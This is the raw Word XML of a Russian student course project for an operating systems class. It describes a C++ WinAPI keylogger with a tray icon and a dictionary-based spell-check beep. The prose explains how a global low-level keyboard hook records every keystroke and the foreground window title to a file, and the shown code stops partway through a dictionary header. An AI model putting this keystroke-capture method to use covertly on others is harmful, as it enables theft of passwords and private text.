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00D2E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73D00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38E661E5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73D00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9467344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73D00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1EC0F92E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C73D00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6C242EC1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322822C" w14:textId="5CC62930" w:rsidR="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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9270A81" w14:textId="29CAB834" w:rsidR="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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109655A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DE8A6BB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151181F" w14:textId="6BB71274" w:rsidR="00C73D00" w:rsidRPr="00976AF7" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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976AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Курсовой проект по курсу </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F171BFB" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00976AF7" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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976AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>«Операционные системы»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549920EF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50C7C003" w14:textId="694BD94F" w:rsidR="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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DDC9E91" w14:textId="33BBE59C" w:rsidR="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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A646FB5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A1E1D1E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04FBC34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DF3C21F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B6B180B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68656B6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AB92934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C6EACB8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CE50036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845EAA4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D4752F2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445DEB0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73D0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 Моисеенков Илья Павлович</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CD86F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73D0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208Б-19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499AA1D6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73D0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Миронов Евгений Сергеевич</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F5E9E" w14:textId="7FC2C5D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73D0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F34B6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28.12.2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D9F01" w14:textId="66029211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73D0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F34B6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отлично</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969A768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73D0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5548038B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6BCBF44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2027063" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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C73D0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2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E7A41" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00">
      <w:pPr>
        <w:spacing w:after="0" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:sectPr w:rsidR="00C73D00" w:rsidRPr="00C73D00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54C4E5DB" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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D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573F3DB1" w14:textId="47DE4C2C" w:rsidR="009E7CBC" w:rsidRDefault="00976AF7" w:rsidP="009E7CB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программу, отслеживающую нажатия клавиш на клавиатуре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кейлоггер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61CFD44" w14:textId="65D5E188" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="009E7CB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реализации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A09DA" w14:textId="10E04C95" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00976A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следит за всеми нажатиями клавиш клавиатуры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логгирует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это в файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6A389" w14:textId="645EBAD3" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00976A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кейлоггер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должен работать как с русской, так и с английской раскладкой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132264B" w14:textId="33A2DEB9" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00976A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кейлоггер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должен фиксировать нажатия клавиш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976AF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976AF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Backspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00976A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т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D44C5" w14:textId="3D647531" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00976A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кейлоггер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должен отображаться в системном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При наведении на иконку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должно показываться сообщение о перехвате клавиш</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F0B0FE" w14:textId="11FBB37B" w:rsidR="00976AF7" w:rsidRPr="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00976A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кейлоггер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должен выполнять </w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проверку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> введённы</w:t>
      </w:r>
      <w:r w:rsidR="001E0217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слов на корректность (проверка орфографии)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F935DC1" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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D00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1AC39D1B" w14:textId="6EFD50A0" w:rsidR="009E7CBC" w:rsidRDefault="00976AF7" w:rsidP="00C73D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языке С++ для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При написании программы использовались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WinAPI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0B00AA" w14:textId="7C64CB78" w:rsidR="00976AF7" w:rsidRDefault="00976AF7" w:rsidP="00C73D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выполняет перехват данных при помощи хука, отслеживающего все нажатия клавиш клавиатуры. </w:t>
      </w:r>
      <w:r w:rsidR="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Учитывается текущая раскладка и состояние клавиатуры. Программа может работать с любыми раскладками, так как используется кодировка </w:t>
      </w:r>
      <w:r w:rsidR="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r w:rsidR="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEB999" w14:textId="087A8EEE" w:rsidR="00CB7A0F" w:rsidRPr="00CB7A0F" w:rsidRDefault="00CB7A0F" w:rsidP="00C73D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Кейлоггер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0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>отслеживает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> название окна, в котором находился пользователь в момент нажатия клавиши. Это название, как и сами клавиши, записываются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B7A0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F4DD52" w14:textId="6CDA5EAD" w:rsidR="003C6F4D" w:rsidRDefault="003C6F4D" w:rsidP="00C73D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кейлоггера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создаётся пустое окно. С этим окном связывается иконка в системном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иконки используется стандартный значок с восклицательным знаком. Для завершения работы программы необходимо нажать правой кнопкой мыши по иконке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трее</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB7A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и подтвердить выключение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD21620" w14:textId="4E106EAE" w:rsidR="003C6F4D" w:rsidRPr="00CB7A0F" w:rsidRDefault="003C6F4D" w:rsidP="00C73D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выполняет проверку на правильность введённых слов. Словарь со всеми возможными словами располагается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dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6F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B7A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При вводе пробела (или другого разделителя) выполняется проверка только что введённого слова. Если такое слово отсутствует в словаре, то будет издан звуковой сигнал. Использу</w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidR="00CB7A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тся стандартны</w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00CB7A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сигнал</w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="00CB7A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7A0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B7A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D561DA" w14:textId="77777777" w:rsidR="00C73D00" w:rsidRPr="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="00C73D00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D00"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24EDC663" w14:textId="3783D732" w:rsidR="009E7CBC" w:rsidRDefault="008F0DB7" w:rsidP="00C73D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программы регистрируется новый класс для окна программы. Для этого используется структура </w:t>
      </w:r>
      <w:r w:rsidRPr="008F0DB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WNDCLASSEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Она заполняется по минимуму, так как окно нужно лишь для привязки иконки из системного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E37A0C" w14:textId="523713B9" w:rsidR="008F0DB7" w:rsidRDefault="008F0DB7" w:rsidP="00C73D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создания пустого окна можно добавлять иконку. Для этого необходимо заполнить поля структуры </w:t>
      </w:r>
      <w:r w:rsidRPr="008F0DB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOTIFYICONDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для иконки используется стандартный треугольный значок с восклицательным знаком. При наведении курсора на иконку появляется сообщение о том,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кейлоггер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работает. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC91E0" w14:textId="433C0F40" w:rsidR="008F0DB7" w:rsidRDefault="008F0DB7" w:rsidP="00C73D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подготовки визуальной части необходимо установить хук, который будет реагировать на все нажатия клавиатуры. </w:t>
      </w:r>
      <w:r w:rsidR="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для этого используется функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E7774" w:rsidRPr="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SetWindowsHookEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E7774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ключом </w:t>
      </w:r>
      <w:r w:rsidRPr="008F0DB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WH_KEYBOARD_LL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E7774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="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-функция определяет структуру </w:t>
      </w:r>
      <w:r w:rsidR="008E7774" w:rsidRPr="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KBDLLHOOKSTRUCT</w:t>
      </w:r>
      <w:r w:rsidR="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, в которой хранится вся информация о нажатой клавише, и отправляет виртуальный код клавиши функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E7774" w:rsidRPr="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WriteToLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999D375" w14:textId="651DE6E6" w:rsidR="008E7774" w:rsidRDefault="008E7774" w:rsidP="00C73D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8E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WriteToLog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хэндл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текущей раскладки и название окна на переднем плане. Если название предыдущего окна отличается от текущего, то новое название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записывается в файл. Также фиксируется дата и время. Функция проверяет состояния клавиш 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8E77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CapsLock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чтобы определить регистр буквы. При помощи функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ToUnicodeEx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мы переводим виртуальный код клавиши в кодировку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а при помощи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E7774">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WideCharToMultiByte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мы получаем символ, соответствующий этому коду. Полученный символ печатается в файл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730011C" w14:textId="32495BD4" w:rsidR="008E7774" w:rsidRPr="00EC16AF" w:rsidRDefault="008E7774" w:rsidP="00C73D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орфографии мной был реализован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dictionary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В основе класса лежит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unordered</w:t>
      </w:r>
      <w:r w:rsidRPr="008E777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. Это наиболее подходящая структура для быстрого поиска слов. Конструктор класса считывает из файла все слова и добавляет их в словарь. Вставка и поиск в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unordered</w:t>
      </w:r>
      <w:r w:rsidRPr="008E777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8E77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выполняются в среднем за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E77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7774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>. Если возникнет проблема при открытии файла, то будет издан соответствующий звуковой сигнал. В противном случае</w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0217" w:rsidRPr="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в буфере</w:t>
      </w:r>
      <w:r w:rsidR="001E02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</w:t>
      </w:r>
      <w:r w:rsidR="001E0217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т хранить</w:t>
      </w:r>
      <w:r w:rsidR="001E0217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 xml:space="preserve"> символы текущего слова</w:t>
      </w:r>
      <w:r w:rsidR="00EC16AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и при вводе пробела (или запятой, точки, вопросительного знака и т.д.) проверять наличие этого слова в словаре. Если такое слово отсутствует, то будет издан предупреждающий звуковой сигнал. Словарь </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC16AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>регистронезависим</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC16AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Также отслеживается нажатие на клавишу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC16AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BackSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC16AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: в этом случае из буфера удаляется последний символ. После проверки слова буфер очищается</w:t>
      </w:r>
      <w:r w:rsidR="001E0217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49B8AC" w14:textId="1E0427D9" w:rsidR="00C73D00" w:rsidRDefault="00C73D00" w:rsidP="009E7CBC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D00"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</w:p>
    <w:p w14:paraId="4CD09DE4" w14:textId="22C379B7" w:rsidR="00C73D00" w:rsidRDefault="003C6F4D" w:rsidP="003C6F4D">
      <w:pPr>
        <w:contextualSpacing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3C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dictionary.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D5668BD" w14:textId="4EB39D4C" w:rsidR="003C6F4D" w:rsidRPr="003C6F4D" w:rsidRDefault="003C6F4D" w:rsidP="003C6F4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C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unordered_set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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>#include &lt;algorithm&gt;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 xml:space="preserve">std::string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dictionary_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "dictionary.txt";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>class dictionary {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>private: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 xml:space="preserve">    std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unordered_set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;std::string&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;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>public: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 xml:space="preserve">    dictionary() {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 xml:space="preserve">        std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in;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C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F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6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dictionary_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::in);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 xml:space="preserve">        if (!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in.is_open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()) {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3C6F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBeep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6F4D">
        <w:rPr>
